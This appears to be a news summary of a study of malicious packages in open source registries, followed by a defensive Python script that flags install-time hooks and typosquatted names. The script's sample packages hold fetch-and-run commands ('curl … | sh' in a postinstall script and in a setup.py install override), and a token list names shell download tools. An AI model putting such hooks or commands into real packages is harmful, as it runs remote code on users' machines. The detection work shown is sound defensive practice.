German and French researchers have published a paper (PDF) on the preprint site arXiv analyzing open source software supply chain attacks of the past few years. A well-known example of a software supply chain attack, in which end users are infected by malicious code embedded in a software product, is the NotPetya ransomware attack in Ukraine.
The attackers compromised the update server of a popular Ukrainian accounting package (M.E.Doc) and pushed malicious updates through it. The attack caused billions of dollars in damage and ranks among the most destructive cyber attacks known.
Another example is the trojanized version of CCleaner, which was downloaded roughly 2.3 million times over about a month. A second kind of software supply chain attack implants malicious code into the dependency packages a software product pulls in. As open source development has become the norm, such attacks are increasingly common.
The researchers analyzed 174 malicious packages found in the npm, PyPI and RubyGems package registries. They found that 56% of the packages triggered their malicious behavior on installation, and 41% used additional conditions to decide whether to run. Sixty-one percent of the malicious packages relied on name similarity to existing packages (typosquatting) to get into the open source ecosystems. The attackers' main goal was data exfiltration.
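Two of the patterns the study counts, install-time triggers and typosquatted names, can be checked statically before a package is installed. The script below is an added example written for this summary; it is not code from the paper or from any registry. The popular-package lists, the suspicious-token list and the two sample packages are constructed for illustration, and the checks are heuristics: a package whose payload only fires under the conditional logic the study describes (the 41% case) will not be caught by looking at install scripts alone.

```python
"""Static pre-install checks for npm and PyPI packages (constructed example).

Heuristics only: install-phase scripts, setuptools cmdclass overrides,
and edit-distance similarity to popular package names.
"""
import ast

# Constructed stand-ins for a real popularity list (top-N names from each registry).
POPULAR_NPM = {"lodash", "express", "react", "request", "chalk", "commander", "axios"}
POPULAR_PYPI = {"requests", "urllib3", "numpy", "django", "flask"}

# npm lifecycle scripts that run during `npm install` of a dependency.
INSTALL_PHASE_SCRIPTS = {"preinstall", "install", "postinstall", "prepare"}

# Substrings that commonly appear when an install script fetches or decodes code.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "base64", "node -e", "eval(", "| sh", "| bash", "/dev/tcp")


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert/delete/substitute); a transposition counts as 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, known=POPULAR_NPM, max_distance: int = 2) -> list:
    """Popular names within edit distance max_distance of `name` (exact match excluded)."""
    lowered = name.lower()
    return sorted(k for k in known if k != lowered and levenshtein(lowered, k) <= max_distance)


def install_hooks(package_json: dict) -> dict:
    """npm scripts that execute at install time, keyed by lifecycle phase."""
    scripts = package_json.get("scripts", {})
    return {k: v for k, v in scripts.items() if k in INSTALL_PHASE_SCRIPTS}


def flag_script(cmd: str) -> list:
    """Suspicious tokens present in a shell command, in SUSPICIOUS_TOKENS order."""
    return [t for t in SUSPICIOUS_TOKENS if t in cmd]


def parse_setup_py(source: str) -> dict:
    """Package name and the setuptools commands overridden via cmdclass in setup().

    Overriding 'install' or 'develop' is the usual way a PyPI package runs
    arbitrary code during `pip install`.
    """
    info = {"name": None, "cmdclass": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and getattr(node.func, "id", None) == "setup":
            for kw in node.keywords:
                if kw.arg == "name" and isinstance(kw.value, ast.Constant):
                    info["name"] = kw.value.value
                elif kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    info["cmdclass"] = [k.value for k in kw.value.keys if isinstance(k, ast.Constant)]
    return info


# Constructed sample: an npm package squatting on "lodash" with a fetch-and-run postinstall.
SAMPLE_PACKAGE_JSON = {
    "name": "lodahs",
    "version": "4.17.21",
    "scripts": {
        "postinstall": "curl -s https://example.invalid/x | sh",
        "test": "mocha",
    },
}

# Constructed sample: a PyPI package squatting on "requests" with an install override.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os

class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("curl -s https://example.invalid/x | sh")  # constructed payload

setup(name="reqeusts", version="0.0.1", cmdclass={"install": PostInstall})
'''


def report(package_json: dict, setup_py: str) -> dict:
    """Combine the checks for one npm package.json and one PyPI setup.py."""
    hooks = install_hooks(package_json)
    setup_info = parse_setup_py(setup_py)
    return {
        "npm_install_hooks": {phase: flag_script(cmd) for phase, cmd in hooks.items()},
        "npm_typosquat_of": typosquat_candidates(package_json.get("name", ""), POPULAR_NPM),
        "pypi_cmdclass_hooks": setup_info["cmdclass"],
        "pypi_typosquat_of": typosquat_candidates(setup_info["name"] or "", POPULAR_PYPI),
    }


if __name__ == "__main__":
    for key, value in report(SAMPLE_PACKAGE_JSON, SAMPLE_SETUP_PY).items():
        print(f"{key}: {value}")
```

Running the script against the two constructed samples flags the `postinstall` script for `curl ` and `| sh`, reports `lodahs` as a near-miss of `lodash`, and reports the `install` override plus `reqeusts` as a near-miss of `requests`. In practice the name check should run against a current top-N list from each registry, and the install-script check is a reason to inspect, not a verdict: plenty of legitimate packages compile native code in `postinstall`.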